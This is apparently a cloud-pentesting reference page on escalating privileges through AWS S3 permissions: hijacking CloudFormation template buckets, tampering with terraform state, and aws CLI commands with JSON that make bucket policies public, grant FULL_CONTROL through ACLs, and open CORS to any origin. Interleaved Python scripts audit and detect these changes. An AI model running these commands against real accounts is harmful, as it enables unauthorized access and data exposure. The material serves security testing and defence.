AWS - S3 Privesc
S3
s3:PutBucketNotification, s3:PutObject, s3:GetObject
An attacker with those permissions over critical buckets may be able to hijack resources and escalate privileges.
For example, an attacker with those permissions on the CloudFormation bucket called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be granted with the following policy:
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:PutBucketNotification",
        "s3:GetBucketNotification",
        "s3:PutObject",
        "s3:GetObject"
      ],
      "Resource": [
        "arn:aws:s3:::cf-templates-*/*",
        "arn:aws:s3:::cf-templates-*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": "s3:ListAllMyBuckets",
      "Resource": "*"
    }
  ]
}
```
The hijack is possible because there is a small time window between the moment the template is uploaded to the bucket and the moment the template is deployed. An attacker can simply create a Lambda function in his own account that is triggered when the bucket notification is sent, and hijack the content of that bucket.
The Pacu module cfn__resouce_injection can be used to automate this attack.
For more information check the original research: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
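As an added example (not code from the original page or from Pacu), a defender-side check for the notification hijack described above: given a configuration in the shape returned by `get-bucket-notification-configuration`, it lists every Lambda/SNS/SQS destination whose ARN belongs to an account other than the bucket owner. The account ids, function and topic names are constructed for the demonstration.

```python
"""Audit an S3 bucket notification configuration for destinations outside the
account that owns the bucket. Added example: the configuration below is constructed
to mirror the hijack described on the page (a Lambda in another account subscribed
to object-created events on a cf-templates bucket)."""

# Constructed sample in the shape returned by GetBucketNotificationConfiguration.
SAMPLE_NOTIFICATION_CONFIG = {
    "LambdaFunctionConfigurations": [
        {
            "Id": "legit-thumbnailer",
            "LambdaFunctionArn": "arn:aws:lambda:us-east-1:111111111111:function:thumbs",
            "Events": ["s3:ObjectCreated:*"],
        },
        {
            "Id": "cf-hijack",  # attacker-owned account subscribed to template uploads
            "LambdaFunctionArn": "arn:aws:lambda:us-east-1:222222222222:function:grab",
            "Events": ["s3:ObjectCreated:Put"],
        },
    ],
    "TopicConfigurations": [
        {"Id": "audit", "TopicArn": "arn:aws:sns:us-east-1:111111111111:audit",
         "Events": ["s3:ObjectRemoved:*"]},
    ],
}

# Section name -> key holding the destination ARN in that section's rules.
DESTINATION_KEYS = {
    "LambdaFunctionConfigurations": "LambdaFunctionArn",
    "TopicConfigurations": "TopicArn",
    "QueueConfigurations": "QueueArn",
}

def arn_account(arn):
    """Account id field of an ARN (arn:partition:service:region:account:resource), or ''."""
    parts = arn.split(":", 5)
    return parts[4] if len(parts) == 6 else ""

def foreign_destinations(config, owner_account):
    """Return (rule id, ARN) for every notification destination not owned by owner_account."""
    findings = []
    for section, arn_key in DESTINATION_KEYS.items():
        for rule in config.get(section, []):
            arn = rule.get(arn_key, "")
            if arn_account(arn) != owner_account:
                findings.append((rule.get("Id", "<no id>"), arn))
    return findings

if __name__ == "__main__":
    for rule_id, arn in foreign_destinations(SAMPLE_NOTIFICATION_CONFIG, "111111111111"):
        print(f"cross-account notification target: {rule_id} -> {arn}")
```

Run it against the real output of `aws s3api get-bucket-notification-configuration` for each cf-templates-* bucket; any hit points at a destination that receives template uploads outside your account.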
s3:PutObject, s3:GetObject
These are the permissions to download and upload objects to S3. Several services inside AWS (and outside of it) use S3 storage to store config files.
An attacker with read access to them could find sensitive information in them.
An attacker with write access to them could modify the data to abuse some service and try to escalate privileges.
Here are some examples:
- If an EC2 instance is storing its user data in an S3 bucket, an attacker could modify it to execute arbitrary code inside the EC2 instance.
s3:PutObject, s3:GetObject (optional) over terraform state file
It is common for terraform state files to be stored in a cloud provider's blob storage, e.g. AWS S3. The state file extension is .tfstate, and bucket names often also indicate that they contain terraform state files. Usually, each AWS account has one such bucket storing the state files that represent the state of the account.
Also, in real-world accounts almost always all developers have s3:* and sometimes even business users have s3:Put*.
So, if you are blessed with the above permissions over these files, there is an attack path that lets you get RCE in the pipeline running with the terraform permissions, often AdministratorAccess, making you the admin of the cloud account. You can also use the same path to perform denial-of-service attacks by making terraform delete legitimate resources.
Follow the details in the Abusing Terraform State Files section of the Terraform Security page for ready-to-use exploit code:
s3:PutBucketPolicy
An attacker with this permission, who needs to be from the same account (otherwise the error The specified method is not allowed will trigger), will be able to grant himself more permissions over the bucket(s), allowing him to read, write, modify, delete and expose buckets.
```bash
# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and maintaining some previous root access
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:root"
      },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::somebucketname"
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:user/username"
      },
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::somebucketname/*"
    }
  ]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1568184932403",
      "Action": [
        "s3:ListBucket"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome",
      "Principal": "*"
    },
    {
      "Sid": "Stmt1568185007451",
      "Action": [
        "s3:GetObject"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome/*",
      "Principal": "*"
    }
  ]
}
```
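The two policies above are exactly what a bucket-policy audit should catch. As an added example (not part of the original page), this checker flags Allow statements whose Principal is the world (`"*"`) or an account outside a trusted set; the sample policy is a constructed copy of the public policy above with one extra cross-account statement, and the trusted account id is the one used on this page.

```python
"""Flag bucket-policy statements that grant access to everyone ("*") or to principals
outside a trusted account set. Added example; SAMPLE_POLICY is constructed."""
import json

TRUSTED_ACCOUNTS = {"123123123123"}  # constructed: the account id used on this page

SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "Stmt1568184932403", "Effect": "Allow", "Action": ["s3:ListBucket"],
     "Resource": "arn:aws:s3:::welcome", "Principal": "*"},
    {"Sid": "Stmt1568185007451", "Effect": "Allow", "Action": ["s3:GetObject"],
     "Resource": "arn:aws:s3:::welcome/*", "Principal": "*"},
    {"Sid": "Partner", "Effect": "Allow", "Action": "s3:PutObject",
     "Resource": "arn:aws:s3:::welcome/*",
     "Principal": {"AWS": ["arn:aws:iam::123123123123:root", "arn:aws:iam::999999999999:user/bob"]}}
  ]
}""")

def principal_ids(principal):
    """Normalise the Principal element ("*", or {AWS: str|list, Service: ...}) to a list."""
    if isinstance(principal, str):
        return [principal]
    ids = []
    for value in principal.values():
        ids.extend(value if isinstance(value, list) else [value])
    return ids

def principal_account(p):
    """Account id for an IAM ARN or a bare 12-digit account id; None for services and "*"."""
    if p.isdigit() and len(p) == 12:
        return p
    parts = p.split(":")
    return parts[4] if len(parts) == 6 and parts[2] == "iam" else None

def risky_statements(policy, trusted=TRUSTED_ACCOUNTS):
    """Return (Sid, reason) for Allow statements reachable by the world or by untrusted
    accounts. Conditions are not evaluated, so a 'public' hit still needs manual review."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "<no sid>")
        for p in principal_ids(stmt.get("Principal", {})):
            if p == "*":
                findings.append((sid, "public principal"))
            elif (acct := principal_account(p)) and acct not in trusted:
                findings.append((sid, f"untrusted account {acct}"))
    return findings
```

Feed it the JSON from `aws s3api get-bucket-policy --query Policy --output text`; S3 Block Public Access stops the public case at write time, but cross-account grants still need this kind of review.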
s3:GetBucketAcl, s3:PutBucketAcl
An attacker could abuse these permissions to grant himself more access over specific buckets.
Note that the attacker does not need to be from the same account. Moreover, the write access
```bash
# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

## JSON ACL example
## Make sure to modify the Owner's displayName and ID according to the Object ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}

## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
```
s3:GetObjectAcl, s3:PutObjectAcl
An attacker could abuse these permissions to grant himself more access over specific objects inside buckets.
```bash
# Update bucket object ACL
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

## JSON ACL example
## Make sure to modify the Owner's displayName and ID according to the Object ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}

## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
```
s3:GetObjectAcl, s3:PutObjectVersionAcl
An attacker with these privileges is expected to be able to put an ACL on a specific object version.
```bash
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
```
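The bucket ACL, object ACL and object-version ACL sections above all use the same `Owner`/`Grants` document, so one check covers all three. As an added example (not part of the original page), this flags grants to the predefined AllUsers and AuthenticatedUsers groups and rates them by whether the permission allows writes; the sample ACL is a constructed copy of the acl.json above with two extra grants.

```python
"""Flag ACL grants to the global AllUsers / AuthenticatedUsers groups, the grants that
the put-bucket-acl / put-object-acl calls on the page hand out. Added example;
SAMPLE_ACL is constructed and works for bucket, object and object-version ACLs alike."""

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anyone on the internet)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}
# Permissions that let the grantee change or take over the resource rather than just read it.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}

SAMPLE_ACL = {
    "Owner": {"DisplayName": "<DisplayName>", "ID": "<ID>"},
    "Grants": [
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
        {"Grantee": {"Type": "CanonicalUser", "ID": "<ID>"}, "Permission": "FULL_CONTROL"},  # the owner
    ],
}

def risky_grants(acl):
    """Return (group label, permission, severity) for every grant to a public group.
    Severity is 'critical' when the permission allows writes (WRITE_ACP alone lets the
    grantee rewrite the ACL and take full control), otherwise 'high' for read access."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        label = PUBLIC_GROUPS.get(grantee.get("URI", ""))
        if label is None:          # e.g. the LogDelivery group: not public, skip
            continue
        perm = grant.get("Permission", "")
        severity = "critical" if perm in WRITE_PERMISSIONS else "high"
        findings.append((label, perm, severity))
    return findings

if __name__ == "__main__":
    for label, perm, severity in risky_grants(SAMPLE_ACL):
        print(f"[{severity}] {perm} granted to {label}")
```

The input is the JSON printed by `get-bucket-acl` or `get-object-acl` (with or without `--version-id`); enabling S3 Object Ownership "bucket owner enforced" disables ACLs entirely and removes this whole class of grant.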
s3:PutBucketCORS
An attacker with the s3:PutBucketCORS permission can modify the bucket's CORS (Cross-Origin Resource Sharing) configuration, which controls which web origins may access its endpoints. If they set a permissive policy, any website can send requests directly to the bucket and read the responses from the browser.
This means that, potentially, if an authenticated user of a web application hosted from the bucket visits the attacker's site, the attacker can abuse the permissive CORS policy and, depending on the application, obtain the user's profile information or even hijack their account.
```bash
aws s3api put-bucket-cors \
  --bucket <BUCKET_NAME> \
  --cors-configuration '{
    "CORSRules": [
      {
        "AllowedOrigins": ["*"],
        "AllowedMethods": ["GET", "PUT", "POST"],
        "AllowedHeaders": ["*"],
        "ExposeHeaders": ["x-amz-request-id"],
        "MaxAgeSeconds": 3000
      }
    ]
  }'
```
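Every technique on this page goes through an S3 control-plane write call (PutBucketNotification, PutBucketPolicy, PutBucketAcl, PutObjectAcl, PutBucketCors), all of which CloudTrail records as management events. As an added example (not part of the original page), this detector scans CloudTrail JSON lines for those calls, marks callers from a different account than the bucket owner (relevant because PutBucketPolicy requires the same account while PutBucketAcl does not), and highlights writes to cf-templates-* buckets. The events are constructed samples using CloudTrail's field names; the account ids and ARNs are made up.

```python
"""Detect the S3 control-plane writes discussed on this page in CloudTrail management
events. Added example; SAMPLE_EVENTS is constructed (real CloudTrail field names,
made-up account ids and ARNs)."""
import json

# S3 API calls on this page that change who can read, write or be notified about a bucket.
WATCHED = {"PutBucketPolicy", "PutBucketAcl", "PutObjectAcl", "PutBucketCors",
           "PutBucketNotification"}

SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "111111111111", "arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"bucketName": "cf-templates-nohnwfax6a6i-us-east-1"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketNotification", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "111111111111", "arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"bucketName": "cf-templates-nohnwfax6a6i-us-east-1"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl", "recipientAccountId": "111111111111",
     "userIdentity": {"accountId": "222222222222", "arn": "arn:aws:iam::222222222222:user/ext"},
     "requestParameters": {"bucketName": "welcome"}},
])

def note(event_name, bucket):
    """Extra context for the analyst: template buckets feed CloudFormation deployments."""
    if event_name == "PutBucketNotification" and bucket.startswith("cf-templates-"):
        return "notification change on CloudFormation template bucket"
    return ""

def suspicious_events(log_lines):
    """Return (eventName, bucket, caller ARN, cross_account, note) for each watched call.
    cross_account is True when the caller's account differs from the bucket owner's."""
    findings = []
    for line in log_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("eventSource") != "s3.amazonaws.com" or ev.get("eventName") not in WATCHED:
            continue
        actor = ev.get("userIdentity", {})
        bucket = ev.get("requestParameters", {}).get("bucketName", "?")
        cross = actor.get("accountId") != ev.get("recipientAccountId")
        findings.append((ev["eventName"], bucket, actor.get("arn", "?"), cross,
                         note(ev["eventName"], bucket)))
    return findings

if __name__ == "__main__":
    for name, bucket, arn, cross, hint in suspicious_events(SAMPLE_EVENTS):
        print(f"{name} on {bucket} by {arn}{' [cross-account]' if cross else ''} {hint}")
```

In production, point it at the flattened `Records` of your CloudTrail files or run the same logic as an EventBridge rule on `eventSource = s3.amazonaws.com`.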